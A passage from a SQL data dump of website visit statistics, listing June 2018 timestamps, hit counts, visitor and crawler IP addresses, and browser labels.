58.86.206','other'),(258952,1528888338,1,0,1,0,'66.249.64.28',''),(258953,1528888852,1,0,1,0,'66.249.64.29',''),(258954,1528888907,3,3,0,0,'216.244.66.241','other'),(258955,1528889106,2,2,0,0,'91.196.178.66','chrome'),(258956,1528889392,1,1,0,0,'141.8.142.74','other'),(258957,1528889749,1,1,0,0,'91.124.182.170','firefox'),(258958,1528889822,1,0,1,0,'66.249.64.30',''),(258959,1528889948,2,2,0,0,'91.196.178.70','chrome'),(258960,1528890252,2,2,0,0,'216.244.66.241','other'),(258961,1528890388,2,2,0,0,'93.73.173.105','chrome'),(258962,1528890609,1,1,0,0,'46.211.108.55','chrome'),(258963,1528890715,1,1,0,0,'94.23.3.136','firefox'),(258964,1528891178,1,1,0,0,'141.8.142.74','other'),(258965,1528891984,1,1,0,0,'95.133.199.144','opera'),(258966,1528892239,3,3,0,0,'91.196.178.70','chrome'),(258967,1528892646,1,1,0,0,'91.196.178.169','chrome'),(258968,1528892702,1,1,0,0,'216.244.66.241','other'),(258969,1528892759,2,2,0,0,'141.8.142.74','other'),(258970,1528892858,1,1,0,0,'180.76.15.137','other'),(258971,1528892866,1,1,0,0,'8.29.198.25','other'),(258972,1528893175,3,3,0,0,'91.196.178.70','chrome'),(258973,1528893600,1,1,0,0,'37.55.253.34','chrome'),(258974,1528893862,1,1,0,0,'178.154.171.88','other'),(258975,1528893977,1,1,0,0,'216.244.66.241','other'),(258976,1528894103,1,1,0,0,'195.28.31.204','chrome'),(258977,1528894296,4,4,0,0,'91.196.178.70','chrome'),(258978,1528894375,1,1,0,0,'120.77.159.175','other'),(258979,1528895282,3,3,0,0,'91.196.178.66','chrome'),(258980,1528895631,1,1,0,0,'216.244.66.241','other'),(258981,1528895728,2,2,0,0,'194.63.143.167','chrome'),(258982,1528895762,1,1,0,0,'37.53.122.74','chrome'),(258983,1528896199,1,1,0,0,'91.196.178.66','chrome'),(258984,1528896211,1,1,0,0,'141.8.142.74','other'),(258985,1528896237,1,1,0,0,'66.102.9.38','chrome'),(258986,1528896244,1,1,0,0,'66.102.9.40','chrome'),(258987,1528896382,1,1,0,0,'91.196.178.182','chrome'),(258988,1528896564,2,2,0,0,'216.244.66.241','other'),(258989,1528896591,1,1,0,0,'157.55.39.46','other'),(258990,1528897205,1,0,1,0,'66.249.64.28',''),(258991,1528897342,1,1,0,0,'91.196.178.182','chrome'),(258992,1528897498,1,1,0,0,'207.46.13.211','other'),(258993,1528897647,1,1,0,0,'141.8.142.74','other'),(258994,1528897983,2,2,0,0,'91.196.178.70','chrome'),(258995,1528898033,1,1,0,0,'216.244.66.241','other'),(258996,1528898424,1,1,0,0,'92.112.125.243','chrome'),(258997,1528898447,1,1,0,0,'8.29.198.27','other'),(258998,1528898638,1,1,0,0,'91.196.178.103','chrome'),(258999,1528898867,2,2,0,0,'37.53.89.22','chrome'),(259000,1528898878,1,1,0,0,'157.55.39.46','other'),(259001,1528899524,1,1,0,0,'141.8.142.167','other'),(259002,1528899656,1,1,0,0,'180.76.15.148','other'),(259003,1528900830,1,1,0,0,'91.209.11.236','other'),(259004,1528900905,1,1,0,0,'216.244.66.241','other'),(259005,1528901964,1,1,0,0,'192.81.222.95','chrome'),(259006,1528902131,1,1,0,0,'176.37.33.161','chrome'),(259007,1528902246,1,1,0,0,'93.75.201.107','firefox'),(259008,1528903633,1,1,0,0,'141.8.142.74','other'),(259009,1528903738,1,1,0,0,'8.29.198.25','other'),(259010,1528903855,2,2,0,0,'178.154.171.88','other'),(259011,1528904620,1,1,0,0,'207.46.13.212','other'),(259012,1528905056,1,1,0,0,'216.244.66.241','other'),(259013,1528905198,1,1,0,0,'95.27.84.7','msie'),(259014,1528905254,1,1,0,0,'188.230.43.254','other'),(259015,1528906028,4,4,0,0,'144.76.176.171','other'),(259016,1528906212,1,1,0,0,'66.249.64.29','chrome'),(259017,1528906391,1,1,0,0,'188.230.43.254','other'),(259018,1528907462,1,1,0,0,'91.196.178.78','firefox'),(259019,1528907868,2,2,0,0,'141.8.142.74','other'),(259020,1528907972,1,1,0,0,'180.76.15.143','other'),(259021,1528908240,1,1,0,0,'188.230.43.254','other'),(259022,1528908316,1,1,0,0,'95.163.255.102','other'),(259023,1528908330,1,1,0,0,'95.163.255.104','other'),(259024,1528909308,1,1,0,0,'8.29.198.25','other'),(259025,1528909737,1,1,0,0,'141.8.142.74','other'),(259026,1528910569,1,1,0,0,'163.172.132.199','chrome'),(259027,1528910644,1,1,0,0,'188.230.43.254','other'),(259028,1528910681,1,1,0,0,'95.163.255.92','other'),(259029,1528911637,2,2,0,0,'178.154.171.88','other'),(259030,1528911644,1,1,0,0,'141.8.142.74','other'),(259031,1528912767,1,1,0,0,'91.196.178.134','firefox'),(259032,1528912783,1,1,0,0,'95.163.255.8','other'),(259033,1528913037,1,1,0,0,'188.230.43.254','other'),(259034,1528913291,1,0,1,0,'66.249.64.29',''),(259035,1528914421,4,4,0,0,'207.46.13.210','other'),(259036,1528914426,1,1,0,0,'207.46.13.211','other'),(259037,1528914431,1,1,0,0,'207.46.13.212','other'),(259038,1528914596,1,1,0,0,'8.29.198.27','other'),(259039,1528914825,1,1,0,0,'141.8.142.74','other'),(259040,1528915615,1,1,0,0,'216.244.66.241','other'),(259041,1528915726,1,1,0,0,'54.224.133.152','other'),(259042,1528916721,1,1,0,0,'207.46.13.211','other'),(259043,1528916869,1,1,0,0,'178.154.171.88','other'),(259044,1528917478,1,1,0,0,'95.163.255.99','other'),(259045,1528917868,1,1,0,0,'178.154.171.88','other'),(259046,1528917908,1,0,1,0,'66.249.64.30',''),(259047,1528918455,1,1,0,0,'141.8.142.74','other'),(259048,1528918722,1,1,0,0,'66.249.70.27','chrome'),(259049,1528918775,1,1,0,0,'194.44.220.194','firefox'),(259050,1528919853,3,3,0,0,'5.9.138.189','other'),(259051,1528919900,1,1,0,0,'5.9.71.213','other'),(259052,1528920161,1,1,0,0,'8.29.198.25','other'),(259053,1528920670,1,0,1,0,'66.249.64.28',''),(259054,1528921025,2,2,0,0,'157.55.39.46','other'),(259055,1528921043,1,1,0,0,'216.244.66.241','other'),(259056,1528921731,1,1,0,0,'66.249.64.30','chrome'),(259057,1528922323,1,1,0,0,'207.46.13.212','other'),(259058,1528922510,1,1,0,0,'141.8.142.74','other'),(259059,1528923869,1,0,1,0,'66.249.64.28',''),(259060,1528925232,1,1,0,0,'207.46.13.211','other'),(259061,1528925452,1,1,0,0,'8.29.198.26','other'),(259062,1528925989,1,1,0,0,'66.249.64.30','chrome'),(259063,1528926359,1,1,0,0,'178.154.171.88','other'),(259064,1528926884,1,0,1,0,'66.249.70.27',''),(259065,1528928441,1,1,0,0,'95.163.255.93','other'),(259066,1528930288,1,1,0,0,'207.46.13.212','other'),(259067,1528930717,1,1,0,0,'141.8.142.74','other'),(259068,1528930849,1,1,0,0,'163.172.4.153','chrome'),(259069,1528931028,1,1,0,0,'8.29.198.26','other'),(259070,1528931338,1,1,0,0,'66.249.64.29','chrome'),(259071,1528932110,1,1,0,0,'54.81.185.30','other'),(259072,1528932829,1,0,1,0,'66.249.70.29',''),(259073,1528932876,1,1,0,0,'216.244.66.241','other'),(259074,1528934181,1,1,0,0,'141.8.142.74','other'),(259075,1528935516,1,1,0,0,'216.244.66.241','other'),(259076,1528936306,1,1,0,0,'8.29.198.27','other'),(259077,1528937371,1,1,0,0,'141.8.142.74','other'),(259078,1528939331,1,1,0,0,'80.252.154.233','chrome'),(259079,1528939593,1,1,0,0,'216.244.66.241','other'),(259080,1528940360,1,1,0,0,'178.154.171.88','other'),(259081,1528940899,68,68,0,0,'204.12.197.234','other'),(259082,1528940972,1,1,0,0,'207.46.13.212','other'),(259083,1528941894,1,1,0,0,'8.29.198.26','other'),(259084,1528942668,1,1,0,0,'95.163.255.99','other'),(259085,1528944003,2,2,0,0,'178.92.249.82','chrome'),(259086,1528944280,70,70,0,0,'78.46.61.245','other'),(259087,1528944947,1,0,1,0,'66.249.64.28',''),(259088,1528945765,1,1,0,0,'5.167.203.89','msie'),(259089,1528946070,1,1,0,0,'216.244.66.241','other'),(259090,1528947163,1,1,0,0,'8.29.198.25','other'),(259091,1528949426,1,1,0,0,'180.76.15.28','other'),(259092,1528950101,1,1,0,0,'216.244.66.241','other'),(259093,1528951774,8,8,0,0,'148.251.9.145','other'),(259094,1528951886,1,0,1,0,'66.249.64.28',''),(259095,1528952765,1,1,0,0,'8.29.198.26','other'),(259096,1528954112,1,1,0,0,'5.166.154.195','msie'),(259097,1528954221,1,1,0,0,'91.196.178.87','firefox'),(259098,1528954495,2,2,0,0,'66.249.64.30','chrome'),(259099,1528954810,2,2,0,0,'91.196.178.70','chrome'),(259100,1528954953,1,1,0,0,'37.55.77.44','chrome'),(259101,1528955486,1,1,0,0,'162.210.196.100','other'),(259102,1528956909,2,2,0,0,'91.196.178.169','chrome'),(259103,1528957262,1,1,0,0,'193.105.62.23','opera'),(259104,1528957420,1,1,0,0,'141.8.142.74','other'),(259105,1528957743,1,1,0,0,'157.55.39.46','other'),(259106,1528957939,1,1,0,0,'78.154.165.48','chrome'),(259107,1528958011,1,1,0,0,'8.29.198.27','other'),(259108,1528958108,1,1,0,0,'46.30.166.175','chrome'),(259109,1528958318,2,2,0,0,'46.174.163.134','chrome'),(259110,1528960167,1,1,0,0,'91.196.177.15','chrome'),(259111,1528960448,1,0,1,0,'66.249.70.27',''),(259112,1528960842,1,1,0,0,'46.174.163.134','chrome'),(259113,1528961083,1,1,0,0,'78.111.190.66','chrome'),(259114,1528961632,1,0,1,0,'66.249.64.28',''),(259115,1528961921,1,1,0,0,'95.163.255.9','other'),(259116,1528961987,1,1,0,0,'207.46.13.212','other'),(259117,1528962703,1,1,0,0,'91.196.178.130','firefox'),(259118,1528962899,2,2,0,0,'91.196.178.70','chrome'),(259119,1528963102,2,2,0,0,'95.135.212.111','chrome'),(259120,1528963628,1,1,0,0,'8.29.198.25','other'),(259121,1528963795,1,1,0,0,'207.46.13.211','other'),(259122,1528963844,1,1,0,0,'141.8.142.74','other'),(259123,1528963926,1,1,0,0,'93.73.171.3','firefox'),(259124,1528963970,1,1,0,0,'178.154.171.88','other'),(259125,1528964110,1,1,0,0,'178.154.200.41','other'),(259126,1528964431,2,2,0,0,'91.196.178.70','chrome'),(259127,1528964939,6,6,0,0,'157.55.39.46','other'),(259128,1528964945,6,6,0,0,'207.46.13.210','other'),(259129,1528964951,12,12,0,0,'207.46.13.212','other'),(259130,1528964963,11,11,0,0,'207.46.13.211','other'),(259131,1528965050,1,1,0,0,'95.163.255.8','other'),(259132,1528965167,2,2,0,0,'91.196.178.162','chrome'),(259133,1528965954,1,1,0,0,'216.244.66.241','other'),(259134,1528966026,1,1,0,0,'178.154.171.88','other'),(259135,1528966104,1,1,0,0,'37.55.88.111','chrome'),(259136,1528967194,1,1,0,0,'91.196.178.129','chrome'),(259137,1528967289,1,1,0,0,'178.154.171.88','other'),(259138,1528967499,1,1,0,0,'87.250.224.46','other'),(259139,1528968591,1,1,0,0,'40.77.167.80','other'),(259140,1528968857,1,1,0,0,'8.29.198.25','other'),(259141,1528969406,1,1,0,0,'91.196.178.129','chrome'),(259142,1528969780,1,1,0,0,'66.249.64.28','chrome'),(259143,1528969890,1,1,0,0,'46.161.9.39','firefox'),(259144,1528970015,1,0,1,0,'66.249.64.29',''),(259145,1528970054,1,1,0,0,'109.200.251.217','chrome'),(259146,1528970386,1,1,0,0,'95.135.88.150','chrome'),(259147,1528970499,1,1,0,0,'178.154.171.88','other'),(259148,1528970621,1,1,0,0,'178.154.200.41','other'),(259149,1528970730,1,1,0,0,'92.112.125.243','chrome'),(259150,1528971981,1,1,0,0,'91.221.218.66','chrome'),(259151,1528972032,1,1,0,0,'180.76.15.24','other'),(259152,1528972254,1,1,0,0,'91.196.178.129','chrome'),(259153,1528972716,1,1,0,0,'54.196.109.20','other'),(259154,1528973119,1,0,1,0,'66.249.64.28',''),(259155,1528973152,1,0,1,0,'66.249.64.29',''),(259156,1528973415,2,2,0,0,'91.196.178.77','chrome'),(259157,1528974484,1,1,0,0,'8.29.198.26','other'),(259158,1528974605,3,3,0,0,'78.111.185.4','chrome'),(259159,1528975106,1,1,0,0,'91.196.178.130','firefox'),(259160,1528976354,1,1,0,0,'95.163.255.95','other'),(259161,1528976922,1,1,0,0,'87.250.224.46','other'),(259162,1528977347,5,5,0,0,'144.76.2.149','other'),(259163,1528977436,4,4,0,0,'91.196.178.77','chrome'),(259164,1528977613,2,2,0,0,'91.196.178.70','chrome'),(259165,1528977742,24,24,0,0,'142.4.200.37','other'),(259166,1528977939,1,1,0,0,'141.8.132.19','other'),(259167,1528978320,2,2,0,0,'54.196.109.20','other'),(259168,1528978650,5,5,0,0,'91.196.178.70','chrome'),(259169,1528978672,1,1,0,0,'31.13.114.54','other'),(259170,1528978684,1,1,0,0,'31.13.113.185','other'),(259171,1528978685,1,1,0,0,'31.13.114.211','other'),(259172,1528978692,1,1,0,0,'95.220.100.117','other'),(259173,1528978707,1,1,0,0,'66.220.151.211','other'),(259174,1528978710,1,1,0,0,'54.165.59.7','other'),(259175,1528978998,1,0,1,0,'66.249.70.27',''),(259176,1528979045,1,1,0,0,'91.196.178.176','chrome'),(259177,1528979117,1,0,1,0,'66.249.64.30',''),(259178,1528979311,2,2,0,0,'91.196.178.74','chrome'),(259179,1528979486,1,1,0,0,'91.124.182.170','chrome'),(259180,1528979704,1,1,0,0,'8.29.198.27','other'),(259181,1528979737,1,1,0,0,'144.76.6.230','other'),(259182,1528979903,3,3,0,0,'91.196.179.33','chrome'),(259183,1528980342,2,2,0,0,'91.196.178.70','chrome'),(259184,1528980512,1,0,1,0,'66.249.64.30',''),(259185,1528980524,1,0,1,0,'66.249.70.29',''),(259186,1528981085,2,2,0,0,'91.196.178.62','chrome'),(259187,1528981564,1,1,0,0,'91.196.178.182','chrome'),(259188,1528981568,1,1,0,0,'141.8.142.74','other'),(259189,1528981749,1,1,0,0,'178.154.171.88','other'),(259190,1528982460,1,1,0,0,'94.153.192.46','firefox'),(259191,1528982466,2,2,0,0,'91.196.177.46','chrome'),(259192,1528983233,1,0,1,0,'66.249.64.29',''),(259193,1528984560,4,4,0,0,'144.76.29.84','other'),(259194,1528984675,1,1,0,0,'40.77.167.180','other'),(259195,1528985362,1,1,0,0,'8.29.198.26','other'),(259196,1528985742,1,1,0,0,'47.96.233.90','other'),(259197,1528987000,1,1,0,0,'178.154.171.88','other'),(259198,1528988131,1,1,0,0,'188.230.43.254','other'),(259199,1528988752,2,2,0,0,'54.158.30.219','other'),(259200,1528989677,1,0,1,0,'66.249.64.29',''),(259201,1528989775,1,0,1,0,'66.249.64.30',''),(259202,1528989933,1,1,0,0,'54.158.30.219','other'),(259203,1528990023,1,1,0,0,'178.154.171.88','other'),(259204,1528990089,3,3,0,0,'141.8.142.74','other'),(259205,1528990493,1,1,0,0,'188.230.43.254','other'),(259206,1528990549,1,1,0,0,'8.29.198.26','other'),(259207,1528991341,3,3,0,0,'54.158.30.219','other'),(259208,1528991812,1,1,0,0,'46.211.154.8','chrome'),(259209,1528992192,1,1,0,0,'157.55.39.188','other'),(259210,1528992362,2,2,0,0,'37.55.58.71','chrome'),(259211,1528992786,7,7,0,0,'54.158.30.219','other'),(259212,1528992893,1,1,0,0,'188.230.43.254','other'),(259213,1528993385,1,0,1,0,'66.249.64.29',''),(259214,1528993894,4,4,0,0,'54.158.30.219','other'),(259215,1528994532,2,0,2,0,'66.249.64.30',''),(259216,1528994912,2,2,0,0,'54.158.30.219','other'),(259217,1528995217,1,1,0,0,'54.165.59.7','other'),(259218,1528995942,4,4,0,0,'54.158.30.219','other'),(259219,1528996218,1,1,0,0,'8.29.198.27','other'),(259220,1528996432,1,1,0,0,'82.145.222.221','chrome'),(259221,1528997064,1,1,0,0,'91.196.178.93','firefox'),(259222,1528997162,1,1,0,0,'199.249.223.66','other'),(259223,1528997290,2,2,0,0,'54.158.30.219','other'),(259224,1528997380,1,1,0,0,'95.163.255.116','other'),(259225,1528997513,1,1,0,0,'141.8.142.74','other'),(259226,1528997838,1,1,0,0,'5.45.207.58','other'),(259227,1528998311,5,5,0,0,'54.158.30.219','other'),(259228,1528999361,8,8,0,0,'54.158.30.219','other'),(259229,1528999757,1,1,0,0,'141.8.142.74','other'),(259230,1529000369,3,3,0,0,'54.158.30.219','other'),(259231,1529000434,1,1,0,0,'66.249.64.29','chrome'),(259232,1529000716,1,1,0,0,'157.55.39.163','other'),(259233,1529001299,3,3,0,0,'54.158.30.219','other'),(259234,1529001408,1,1,0,0,'8.29.198.26','other'),(259235,1529002193,1,1,0,0,'216.244.66.241','other'),(259236,1529002244,1,1,0,0,'188.230.43.254','other'),(259237,1529002426,4,4,0,0,'54.158.30.219','other'),(259238,1529002837,2,2,0,0,'195.10.210.49','chrome'),(259239,1529003243,1,1,0,0,'178.154.200.41','other'),(259240,1529003334,1,1,0,0,'141.8.142.74','other'),(259241,1529003894,2,2,0,0,'54.158.30.219','other'),(259242,1529004954,2,2,0,0,'216.244.66.241','other'),(259243,1529005069,1,1,0,0,'178.154.171.88','other'),(259244,1529005440,1,1,0,0,'46.161.9.39','firefox'),(259245,1529006827,1,1,0,0,'87.250.224.46','other'),(259246,1529006888,1,1,0,0,'93.75.8.57','firefox'),(259247,1529007076,1,1,0,0,'8.29.198.26','other'),(259248,1529007219,2,2,0,0,'162.243.242.68','msie'),(259249,1529007229,10,10,0,0,'162.243.242.68','opera'),(259250,1529007770,1,1,0,0,'216.244.66.241','other'),(259251,1529009970,1,1,0,0,'69.171.240.177','other'),(259252,1529011370,1,1,0,0,'87.250.224.46','other'),(259253,1529012257,1,1,0,0,'8.29.198.26','other'),(259254,1529012272,1,1,0,0,'141.8.142.74','other'),(259255,1529012383,1,1,0,0,'180.76.15.19','other'),(259256,1529012949,1,1,0,0,'94.180.191.103','other'),(259257,1529014563,1,1,0,0,'69.63.188.203','other'),(259258,1529015514,1,1,0,0,'141.8.142.74','other'),(259259,1529016651,11,11,0,0,'23.237.4.26','other'),(259260,1529017212,3,3,0,0,'216.244.66.241','other'),(259261,1529017393,1,0,1,0,'66.249.64.17',''),(259262,1529017932,1,1,0,0,'8.29.198.25','other'),(259263,1529018532,1,1,0,0,'216.244.66.241','other'),(259264,1529019057,1,1,0,0,'157.55.39.163','other'),(259265,1529019351,2,1,1,0,'66.249.64.17',''),(259266,1529021312,1,1,0,0,'216.244.66.241','other'),(259267,1529021547,2,1,1,0,'66.249.64.16',''),(259268,1529021685,2,2,0,0,'141.8.142.74','other'),(259269,1529022023,1,0,1,0,'66.249.64.17',''),(259270,1529022531,2,2,0,0,'216.244.66.241','other'),(259271,1529023111,1,1,0,0,'8.29.198.26','other'),(259272,1529023124,1,0,1,0,'66.249.64.15',''),(259273,1529023754,1,1,0,0,'128.72.68.75','msie'),(259274,1529023897,1,1,0,0,'216.244.66.241','other'),(259275,1529024691,1,1,0,0,'66.249.64.16','chrome'),(259276,1529024905,1,0,1,0,'66.249.64.15',''),(259277,1529026336,1,1,0,0,'216.244.66.241','other'),(259278,1529026794,1,1,0,0,'87.250.224.46','other'),(259279,1529026831,1,1,0,0,'141.8.142.74','other'),(259280,1529027649,1,1,0,0,'216.244.66.241','other'),(259281,1529028216,1,1,0,0,'141.8.142.74','other'),(259282,1529028326,1,1,0,0,'157.55.39.163','other'),(259283,1529028784,1,1,0,0,'8.29.198.26','other'),(259284,1529029342,1,1,0,0,'216.244.66.241','other'),(259285,1529030118,1,1,0,0,'87.250.224.46','other'),(259286,1529030120,1,1,0,0,'37.9.113.182','other'),(259287,1529030299,2,2,0,0,'216.244.66.241','other'),(259288,1529031742,1,1,0,0,'216.244.66.241','other'),(259289,1529032585,1,0,1,0,'66.249.64.15',''),(259290,1529033018,2,2,0,0,'178.92.251.128','chrome'),(259291,1529033465,1,1,0,0,'157.55.39.163','other'),(259292,1529033962,1,1,0,0,'8.29.198.26','other'),(259293,1529034030,1,0,1,0,'66.249.70.25',''),(259294,1529034084,1,1,0,0,'141.8.142.74','other'),(259295,1529034316,1,1,0,0,'37.9.113.182','other'),(259296,1529035047,2,0,2,0,'66.249.64.15',''),(259297,1529036256,1,1,0,0,'188.230.43.254','other'),(259298,1529038019,4,4,0,0,'95.216.38.186','other'),(259299,1529038284,1,0,1,0,'66.249.64.17',''),(259300,1529038322,1,1,0,0,'188.255.28.126','msie'),(259301,1529038499,1,1,0,0,'157.55.39.163','other'),(259302,1529039590,3,3,0,0,'141.8.142.74','other'),(259303,1529039626,1,1,0,0,'8.29.198.27','other'),(259304,1529039746,1,1,0,0,'178.154.171.88','other'),(259305,1529040527,2,2,0,0,'54.165.59.7','other'),(259306,1529040985,1,1,0,0,'95.134.221.22','chrome'),(259307,1529041241,1,1,0,0,'108.59.8.80','other'),(259308,1529041361,1,1,0,0,'91.196.178.93','chrome'),(259309,1529041440,1,1,0,0,'37.55.77.44','chrome'),(259310,1529041658,1,1,0,0,'141.8.142.74','other'),(259311,1529041987,2,2,0,0,'54.165.59.7','other'),(259312,1529042334,1,1,0,0,'66.249.64.15','chrome'),(259313,1529042499,1,1,0,0,'91.196.178.93','chrome'),(259314,1529042668,1,1,0,0,'87.250.224.46','other'),(259315,1529042697,1,1,0,0,'178.154.171.88','other'),(259316,1529043476,4,4,0,0,'54.165.59.7','other'),(259317,1529043892,2,2,0,0,'91.196.178.70','chrome'),(259318,1529044124,1,1,0,0,'213.239.215.251','other'),(259319,1529044212,2,2,0,0,'141.8.142.74','other'),(259320,1529044377,1,1,0,0,'54.165.59.7','other'),(259321,1529044480,1,1,0,0,'54.158.30.219','other'),(259322,1529044806,1,1,0,0,'8.29.198.26','other'),(259323,1529045857,3,3,0,0,'54.165.59.7','other'),(259324,1529046732,1,1,0,0,'120.79.186.194','other'),(259325,1529047345,1,1,0,0,'141.8.142.74','other'),(259326,1529047365,1,1,0,0,'91.196.178.184','chrome'),(259327,1529047422,1,0,1,0,'66.249.64.17',''),(259328,1529047733,2,2,0,0,'91.196.178.169','chrome'),(259329,1529047879,1,1,0,0,'54.165.59.7','other'),(259330,1529047891,1,1,0,0,'13.57.220.0','chrome'),(259331,1529047918,1,1,0,0,'195.10.210.49','chrome'),(259332,1529048979,1,1,0,0,'80.93.117.29','chrome'),(259333,1529050038,1,1,0,0,'46.219.33.167','chrome'),(259334,1529050296,1,1,0,0,'207.46.13.18','other'),(259335,1529050470,1,1,0,0,'8.29.198.25','other'),(259336,1529050488,1,0,1,0,'66.249.70.27',''),(259337,1529050774,2,2,0,0,'54.208.102.37','other'),(259338,1529050776,1,1,0,0,'107.21.1.8','other'),(259339,1529051030,1,1,0,0,'83.170.203.202','chrome'),(259340,1529051580,1,1,0,0,'46.219.33.167','chrome'),(259341,1529052130,1,1,0,0,'80.254.155.43','chrome'),(259342,1529053253,1,1,0,0,'141.8.142.74','other'),(259343,1529053491,2,2,0,0,'91.196.178.70','chrome'),(259344,1529053892,1,1,0,0,'180.76.15.146','other'),(259345,1529053894,1,1,0,0,'180.76.15.16','other'),(259346,1529054039,1,1,0,0,'91.196.178.49','chrome'),(259347,1529054645,12,12,0,0,'91.196.178.70','chrome'),(259348,1529055202,1,1,0,0,'31.148.135.159','chrome'),(259349,1529055462,1,1,0,0,'157.55.39.11','other'),(259350,1529055619,5,5,0,0,'91.196.178.70','chrome'),(259351,1529055638,1,1,0,0,'31.13.114.52','other'),(259352,1529055643,1,1,0,0,'31.13.115.11','other'),(259353,1529055661,1,1,0,0,'8.29.198.27','other'),(259354,1529055662,1,1,0,0,'66.220.151.180','other'),(259355,1529055849,1,1,0,0,'66.249.64.17','chrome'),(259356,1529056239,1,1,0,0,'94.178.114.232','firefox'),(259357,1529056498,1,0,1,0,'66.249.70.27',''),(259358,1529056543,1,1,0,0,'37.73.51.158','chrome'),(259359,1529056590,1,1,0,0,'91.196.177.46','chrome'),(259360,1529056817,1,1,0,0,'91.196.178.49','chrome'),(259361,1529057522,1,1,0,0,'213.174.0.65','chrome'),(259362,1529057995,1,1,0,0,'91.196.177.46','chrome'),(259363,1529058642,1,1,0,0,'91.196.178.132','firefox'),(259364,1529058973,1,1,0,0,'91.196.177.46','chrome'),(259365,1529059024,1,1,0,0,'195.201.126.85','other'),(259366,1529059290,1,1,0,0,'141.8.142.74','other'),(259367,1529060332,1,1,0,0,'144.76.96.236','other'),(259368,1529060733,1,1,0,0,'91.196.178.71','firefox'),(259369,1529061319,1,1,0,0,'62.205.134.182','other'),(259370,1529061333,1,1,0,0,'8.29.198.25','other'),(259371,1529061384,1,1,0,0,'178.154.171.88','other'),(259372,1529061657,2,2,0,0,'91.196.178.71','firefox'),(259373,1529061985,1,1,0,0,'91.196.178.181','chrome'),(259374,1529062190,1,1,0,0,'141.8.142.74','other'),(259375,1529063097,1,1,0,0,'91.196.178.71','chrome'),(259376,1529063613,1,1,0,0,'37.73.15.229','other'),(259377,1529063790,1,1,0,0,'178.95.66.46','chrome'),(259378,1529063943,1,1,0,0,'83.170.203.202','firefox'),(259379,1529064175,2,2,0,0,'91.124.82.8','chrome'),(259380,1529064186,1,1,0,0,'91.196.178.71','chrome'),(259381,1529064781,1,1,0,0,'141.8.142.74','other'),(259382,1529064912,1,1,0,0,'62.205.134.182','other'),(259383,1529065099,2,2,0,0,'91.196.177.46','chrome'),(259384,1529065375,1,1,0,0,'46.133.185.168','chrome'),(259385,1529065393,1,1,0,0,'91.124.182.170','firefox'),(259386,1529066504,1,1,0,0,'8.29.198.25','other'),(259387,1529066605,2,2,0,0,'178.154.171.88','other'),(259388,1529066874,1,1,0,0,'95.132.28.104','firefox'),(259389,1529066882,1,0,1,0,'66.249.70.29',''),(259390,1529067871,2,2,0,0,'91.196.178.169','chrome'),(259391,1529068099,1,1,0,0,'157.55.39.210','other'),(259392,1529068429,1,1,0,0,'91.196.178.181','chrome'),(259393,1529068501,1,1,0,0,'141.8.142.74','other'),(259394,1529068512,1,1,0,0,'62.205.134.182','other'),(259395,1529069120,1,1,0,0,'66.249.64.17','chrome'),(259396,1529069455,1,1,0,0,'46.211.154.220','chrome'),(259397,1529069884,1,1,0,0,'195.62.15.45','firefox'),(259398,1529070259,3,3,0,0,'178.154.171.88','other'),(259399,1529070262,1,1,0,0,'87.250.224.46','other'),(259400,1529070279,1,1,0,0,'141.8.142.74','other'),(259401,1529072121,1,1,0,0,'62.205.134.182','other'),(259402,1529072188,1,1,0,0,'8.29.198.25','other'),(259403,1529072215,1,1,0,0,'207.46.13.36','other'),(259404,1529072289,2,2,0,0,'91.124.82.8','chrome'),(259405,1529073798,1,1,0,0,'82.207.47.76','chrome'),(259406,1529074292,2,2,0,0,'198.38.82.72','msie'),(259407,1529074298,1,1,0,0,'198.38.82.72','firefox'),(259408,1529074303,10,10,0,0,'198.38.82.72','opera'),(259409,1529075394,1,1,0,0,'207.46.13.39','other'),(259410,1529075530,1,1,0,0,'141.8.142.74','other'),(259411,1529075727,1,1,0,0,'94.16.123.176','other'),(259412,1529076549,2,2,0,0,'91.124.82.8','chrome'),(259413,1529077351,1,1,0,0,'8.29.198.26','other'),(259414,1529078338,1,1,0,0,'188.230.43.254','other'),(259415,1529078567,1,1,0,0,'66.249.64.29','chrome'),(259416,1529079116,1,0,1,0,'66.249.70.29',''),(259417,1529079121,4,4,0,0,'5.9.112.210','other'),(259418,1529079277,1,1,0,0,'91.124.82.8','chrome'),(259419,1529079314,1,1,0,0,'62.205.134.182','other'),(259420,1529079613,2,2,0,0,'91.196.178.175','chrome'),(259421,1529080189,8,8,0,0,'141.8.142.74','other'),(259422,1529080731,1,1,0,0,'188.230.43.254','other'),(259423,1529080949,2,2,0,0,'178.154.171.88','other'),(259424,1529080958,1,1,0,0,'87.250.224.46','other'),(259425,1529081038,2,2,0,0,'91.196.178.175','chrome'),(259426,1529081482,1,0,1,0,'66.249.64.28',''),(259427,1529081721,1,1,0,0,'216.244.66.241','other'),(259428,1529081783,1,1,0,0,'91.196.178.130','chrome'),(259429,1529082255,1,1,0,0,'91.196.178.83','firefox'),(259430,1529082914,1,1,0,0,'62.205.134.182','other'),(259431,1529083030,1,1,0,0,'8.29.198.26','other'),(259432,1529083132,1,1,0,0,'188.230.43.254','other'),(259433,1529083274,1,1,0,0,'95.163.255.115','other'),(259434,1529083308,1,1,0,0,'95.163.255.108','other'),(259435,1529083939,1,1,0,0,'37.73.63.129','chrome'),(259436,1529085317,1,1,0,0,'207.46.13.36','other'),(259437,1529085540,1,1,0,0,'188.230.43.254','other'),(259438,1529086232,1,1,0,0,'37.73.121.158','chrome'),(259439,1529086234,2,0,2,0,'66.249.64.30',''),(259440,1529086410,2,1,1,0,'66.249.70.25',''),(259441,1529086513,1,1,0,0,'62.205.134.182','other'),(259442,1529087022,1,1,0,0,'95.163.255.93','other'),(259443,1529087376,2,2,0,0,'178.154.171.88','other'),(259444,1529087428,1,1,0,0,'207.46.13.38','other'),(259445,1529088387,1,1,0,0,'8.29.198.25','other'),(259446,1529088563,1,1,0,0,'141.8.142.74','other'),(259447,1529089564,1,1,0,0,'91.232.158.75','other'),(259448,1529089617,1,0,1,0,'66.249.69.195',''),(259449,1529090048,1,1,0,0,'207.46.13.39','other'),(259450,1529090112,1,1,0,0,'62.205.134.182','other'),(259451,1529090129,1,1,0,0,'87.250.224.46','other'),(259452,1529090186,1,1,0,0,'141.8.142.74','other'),(259453,1529090188,3,3,0,0,'91.196.178.181','chrome'),(259454,1529090761,1,1,0,0,'91.196.178.41','chrome'),(259455,1529091088,1,1,0,0,'178.154.171.88','other'),(259456,1529091628,1,1,0,0,'91.209.11.236','other'),(259457,1529092095,1,1,0,0,'141.8.142.74','other'),(259458,1529092624,1,1,0,0,'46.211.114.18','chrome'),(259459,1529093712,1,1,0,0,'